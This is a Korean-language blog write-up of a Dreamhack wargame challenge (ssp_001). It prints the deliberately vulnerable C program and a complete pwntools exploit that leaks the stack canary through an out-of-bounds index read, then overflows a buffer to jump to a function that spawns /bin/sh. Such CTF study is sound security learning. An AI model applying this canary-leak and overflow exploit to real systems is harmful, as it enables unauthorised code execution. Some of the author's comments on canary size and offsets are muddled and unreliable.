ssp_001

🌇│System_Study/📕│Dreamhack_Hacking

ssp_001

Jastes 2022. 5. 23. 09:39

문제풀이

메모리 보호 기법을 먼저 보시면 canary적용과 NX가 있죠 RELRO는 저게 된건가?
Relro는 다음에 자세히 서술할 시간이 오겠죠 그러니 이 내용은 패스하고

코드를 보면서 뭐가 취약한 코드인지 시큐어 코딩과 유사하게 지적까지 해볼까요

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65 #include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
 
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
 
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
 
void get_shell() {
    system("/bin/sh");
}
 
void print_box(unsigned char *box, int idx) {
    printf("Element of index %d is : %02x\n", idx, box[idx]);
}
 
void menu() {
    puts("[F]ill the box");
    puts("[P]rint the box");
    puts("[E]xit");
    printf("> ");
}
 
 
int main(int argc, char *argv[]) {
    unsigned char box[0x40] = {};
    char name[0x40] = {};
    char select[2] = {};
    int idx = 0, name_len = 0;
 
    initialize();
    while(1) {
        menu();
        read(0, select, 2);
 
        switch( select[0] ) {
            case 'F':
                printf("box input : ");
                read(0, box, sizeof(box));
                break;
            case 'P':
                printf("Element index : ");
                scanf("%d", &idx);
                print_box(box, idx);
                break;
            case 'E':
                printf("Name Size : ");
                scanf("%d", &name_len);
                printf("Name : ");
                read(0, name, name_len);
                return 0;
            default:
                break;
        }
    }
}
Colored by Color Scripter cs

이 코드입니다. 제목과 주제가 주제이므로 당연히 BOF가 적어도 두 번 나오겠죠
코드를 보시면...

솔직히 저 case 모두 취약한 코드이긴 해요 뭐가 문제인지 하나씩 알아볼까요

위 코드는 BOF를 발생시킬 수 있지만 치명적인 코드 실행까지는 불가능하므로 Canary값을 생성하는데..
왜냐하면 Box의 변수명인 변수 배열의 길이가 0x40이니까 그 이상으로 입력하시면 되겠죠

두 번째 코드는 우리가 입력값의 인자의 길이를 지정하기에 당연히 BOF를 발생시킬 수 있겠죠
특히 print_box에서 값을 출력하므로 이 코드를 통해 Canary 값을 얻어 릭을 시켜야합니다!

위 코드를 분석하면 참 불편하게 0x2만큼 출력을 조끔씩 하므로 이 점을 주의해서 반복문으로
값을 얻어 누적시켜 얻어 Canary릭을 실행시켜봅시다.

이제 얻은 것들로 사이즈 확인하고 BOF를 일으키며 확인하시면 완벽하게 익스플로잇!

참고로 구성은 아례와 같이 되어있어요

코드 심층 분석!

IDA(혹은 gdb로 하셔도 되요)로 보시면 var_8에 qword ptr(ebp-0x8)이라는 이야기이며
gdb에선 main+25(ebp-0x8)로 canary값을 치환합니다.
참고로 총 버퍼값은 [ebp-0x98]로 잡았는데 ebp-0x88로 주소를 치환하는 stack alignment땜이죠

그러하다면 실제론 배운 내용대로 그리고 익숙해지기위해 값을 넣고 실행하기 직접해봐야지만
더 좋은 방법이 있죠 pwntools로 코드를 짜면서 바로 확인할 수 있는 방법인 gdb.attach를 사용하면 되요
자세한 사용방법은 아례 링크를 확인해주세요(지금까진 저도 많이 복잡한 코드를 하는 건 아니라 딱히..)

여기서 의구심이 들어야 정상인 부분이 하나 있어요
x86-64(x86)인 아키텍처에 canary값이 왜 8byte를 받을까?
아마 stack alignment의 이유에서 받거나 혹은 우리 실행하는 환경이 x64환경으로 자동으로 받기에
메모리 최적화 및 기타 보안적 이유로 컴파일 환경에 맞추어 바뀐 것으로 추측합니다.. 아마도?

pwntools gdb.attach 사용법 - python process debugging

gdb.attach 사용법 wargame이나 ctf 문제를 풀 때, 혹은 바이너리를 분석 할 때 파이썬으로 데이터를 입력하는 경우가 자주있다. example> p = process("binary") p.sendline("AAAA") 이 때 내가 입력한 데이터가..

cosyp.tistory.com

시나리오 파악 끝났고 익스플로잇 코드를 확인해볼까요?
주석 다 해놔서 딱히 코드 설명은 안해도 되겠죠?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45 #!/bin/usr/python3
from pwn import *
def slog(n, m): return success(':'.join([str(n), hex(m)]))
 
p = process('./ssp_001')
#p = remote('host1.dreamhack.games', 15060)
context(arch='amd64', os='linux')
context.log_level = 'debug'
e = ELF('./ssp_001')
 
#gdb disamble checking
#gdb.attach(p)
 
 
#[1] Get information buf(Canary and get_shell address)
sh = p32(e.symbols['get_shell'])    #get_shell addr getting
cnry = b''  #canary 4byte stack
 
p.sendlineafter('> ', 'F')
p.sendlineafter('input : ', b'A'*0x41)  #because frist byte is nullbyte so, name buf 40byte + 1byte(null_byte)
 
for idx in range(4):    # canary 4byte buf
    p.sendlineafter('> ', 'P')
    p.sendlineafter('index : ', chr(0x80 + idx))    #code is 02x ffush so, Repeat four times idx checking
    p.recvuntil('is : ')
    cnry += p.recvuntil('\n')[:2]    #because frist byte is null byte \x00
cnry = int(cnry, 16)
 
slog('Address Canary', cnry)
slog('Address get_shell', u32(sh))
 
 
#[2] Canary lack using
 
#payload = sh.rjust(0x40, u"A") + p32(cnry) + b'B'*0x4
payload = b'A'*0x40 + p32(cnry) + b'B'*0x8 + sh
 
 
# payload_len = len(payload.decode('utf-8', 'backslashreplace'))
p.sendlineafter('> ', 'E')
p.sendlineafter('Size : ', '80')
p.sendafter('Name : ', payload)
 
p.interactive()
 
Colored by Color Scripter cs

참고로 전 저 코드에서 canary 릭 얻는 과정에서 cnry+= 이런 식으로 해도 될줄 알았는데
리틀엔디안 치환 과정이나 받는 과정에서 저런 식으로 하면 안되더라고요 왜인지.. 딱히 이해가 안갔는데
찬찬히 봐보시면 이해가 될거예요 나머지 모르는 코드도 천천히 봐보세요

참고로 실행하다보면 막 ByteError 뜨면서 머라머라 뜨는데 무시하셔도 되요